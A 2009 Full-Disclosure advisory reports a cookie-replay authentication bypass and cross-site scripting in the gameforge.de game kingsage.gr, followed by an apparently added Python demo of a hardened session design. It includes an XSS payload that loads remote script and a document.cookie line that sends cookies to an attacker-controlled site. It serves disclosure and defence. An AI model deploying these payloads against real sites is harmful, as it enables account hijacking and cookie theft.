
List:       full-disclosure
Subject:    [Full-disclosure] gameforge.de gaming platform (validated for:
From:       mestre rigel <mestre.rigel () gmail ! com>
Date:       2009-09-30 7:28:09
Message-ID: 938f06e60909300028q612df2d4n35f9db011d5d89cf () mail ! gmail ! com



Dear all,

I'd like to inform you about a security vulnerability in the gameforge.de
gaming platform.

This vulnerability is validated only for kingsage.gr (versions 0.1.17,
0.1.18 and 0.1.19 - latest) but might affect all games developed under the
specific gaming platform (e.g.: ikariam, gladiatus, katsuro, battleknight,
bitefight, etc.)

=========================== Authentication bypass using hashed values ====================

After the initial login into the game all following plain HTTP GET/POST
requests are similar to this:

GET http://s1.kingsage.gr/game.php?village=24482&s=build_main HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword,
application/x-shockwave-flash, application/x-ms-application,
application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml,
application/x-silverlight, */*
Referer:
http://s1.kingsage.gr/game.php?village=24482&s=build_main&p=2141&build=iron
Accept-Language: el
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR
2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FDM; .NET CLR
1.1.4322)
Host: s1.kingsage.gr
Cookie: game_hash=cce006dc722ff22ad8a8e5a13fd3c698;
SD_FRAMEWORK_SESSION=0b1f74bebf7875e96338e9d4c6e37d4e; game_user=some.user;
game_pass=347183427615221ca90w24db1039a8cc
Proxy-Connection: Keep-Alive

which, among other things, include three critical elements:

village=24482 [The village number - can be found for any user from within
the game]
game_user=some.user [The user's username in plaintext]
game_pass=347183427615221ca90w24db1039a8cc [The md5 hash value of the user's
password]

Taking into account that this traffic, which is plain HTTP, can be sniffed
and that the game's cookies do not expire, a malicious user - by obtaining
another user's cookies *once* - can bypass authentication and access the
application/game as that user *at any time*.

The steps are the following:

1. The malicious user uses his/her personal account to enter the game.
2. The malicious user modifies any following request by deleting
SD_FRAMEWORK_SESSION and game_hash from the cookie and POSTs only the
village, game_user and game_pass values that he/she has obtained.

Using this approach a malicious user can access (at any time) the account of
another user without knowing his/her (plaintext) password.
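The weakness described above is that the cookie carries a persistent credential (username plus md5 of the password), which the server accepts on every request with no expiry and over plain HTTP. The following Python is an added example, not the advisory's or Gameforge's code: it models that scheme next to a server-side session design in which the credential is checked once and only a random, expiring, Secure/HttpOnly token travels in the cookie. The class names, the sample user and password, the PBKDF2 parameters and the one-hour time-to-live are assumptions chosen for the demo.

```python
import hashlib
import hmac
import secrets
import time

# Constructed sample credential for the demo (not a real account).
PASSWORD = "example-password"

# --- Scheme the advisory describes ---------------------------------------
# game_pass is md5(password) and is accepted as a credential on every request.
MD5_USERS = {"some.user": hashlib.md5(PASSWORD.encode()).hexdigest()}


class CookieAuthVulnerable:
    """Any request carrying game_user + game_pass is accepted, at any time,
    whether or not SD_FRAMEWORK_SESSION / game_hash are present."""

    def login(self, user, password):
        if MD5_USERS.get(user) == hashlib.md5(password.encode()).hexdigest():
            return {"game_user": user, "game_pass": MD5_USERS[user],
                    "SD_FRAMEWORK_SESSION": secrets.token_hex(16)}
        return None

    def authenticate(self, cookies):
        user = cookies.get("game_user")
        if user and hmac.compare_digest(MD5_USERS.get(user, ""),
                                        cookies.get("game_pass", "")):
            return user
        return None


# --- Server-side session design (hypothetical hardened version) -----------
def _kdf(password, salt):
    # Slow, salted hash for the stored verifier; never placed in a cookie.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


_SALT = secrets.token_bytes(16)
PBKDF2_USERS = {"some.user": (_SALT, _kdf(PASSWORD, _SALT))}


class SessionAuthHardened:
    """Credential checked once at login; afterwards only a random session
    token that the server can expire or revoke is sent by the client."""

    def __init__(self, ttl_seconds=3600, clock=time.time):
        self.ttl = ttl_seconds
        self.clock = clock
        self.sessions = {}  # token -> (user, expires_at)

    def login(self, user, password):
        rec = PBKDF2_USERS.get(user)
        if rec is None or not hmac.compare_digest(rec[1], _kdf(password, rec[0])):
            return None
        token = secrets.token_urlsafe(32)
        self.sessions[token] = (user, self.clock() + self.ttl)
        return {"session": token}

    def set_cookie_header(self, cookie):
        # Secure: not sent over plain HTTP; HttpOnly: not readable by script.
        return (f"Set-Cookie: session={cookie['session']}; Max-Age={self.ttl}; "
                "Path=/; Secure; HttpOnly; SameSite=Lax")

    def authenticate(self, cookies):
        token = cookies.get("session")
        entry = self.sessions.get(token)
        if entry is None:
            return None
        user, expires_at = entry
        if self.clock() >= expires_at:
            del self.sessions[token]  # expired tokens are dropped server-side
            return None
        return user

    def logout(self, cookies):
        self.sessions.pop(cookies.get("session"), None)


def demo():
    """Replay a cookie captured once against both designs; returns a dict of
    named boolean outcomes."""
    results = {}
    vuln = CookieAuthVulnerable()
    sniffed = vuln.login("some.user", PASSWORD)  # cookie observed once on the wire
    # Session values dropped, credential values kept, replayed much later.
    replay = {k: sniffed[k] for k in ("game_user", "game_pass")}
    results["vuln_replay_accepted"] = vuln.authenticate(replay) == "some.user"

    now = [1_000_000.0]  # mutable clock so the demo can move time forward
    srv = SessionAuthHardened(ttl_seconds=3600, clock=lambda: now[0])
    cookie = srv.login("some.user", PASSWORD)
    results["hard_fresh_ok"] = srv.authenticate(cookie) == "some.user"
    results["hard_cookie_carries_no_credential"] = (
        "game_pass" not in cookie and PASSWORD not in cookie["session"])
    results["hard_flags"] = all(f in srv.set_cookie_header(cookie)
                                for f in ("Secure", "HttpOnly", "Max-Age"))
    now[0] += 3600
    results["hard_expired_rejected"] = srv.authenticate(cookie) is None
    cookie2 = srv.login("some.user", PASSWORD)
    srv.logout(cookie2)
    results["hard_logout_rejected"] = srv.authenticate(cookie2) is None
    results["hard_wrong_password_rejected"] = srv.login("some.user", "wrong") is None
    return results


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {ok}")
```

The point the demo makes is that a captured cookie is only as dangerous as what it contains and how long the server honours it: with a server-side session store the token can expire, be revoked at logout, and carries nothing that reveals the password.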

=========================== Vulnerability Impact (Correlated with Cross Site Scripting) =============

The existence of Cross Site Scripting at the gaming platform raises the
impact of the vulnerability:

As an example if malicious user [A] sends to user [B] a message like this:

[url]http://s1.kingsage.gr/redir.php?url=%3CSCRIPT%20SRC=http://www.stormloader.com/users/hakin/kingsagegr.js%3E%3C/SCRIPT%3E[/url]


*From within the game's messaging functionality*

User [A] is able to inject/include malicious javascript code [<SCRIPT
SRC=http://../maliciouscode.js></SCRIPT>] in order to steal the cookie of
user [B] - which includes all sensitive information for the attack described
in the first part.

(This can be accomplished using e.g.: document.location='http://user_a_controlled_site?cookie='+document.cookie; in the maliciouscode.js)

Kind regards,

mestre.rigel



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
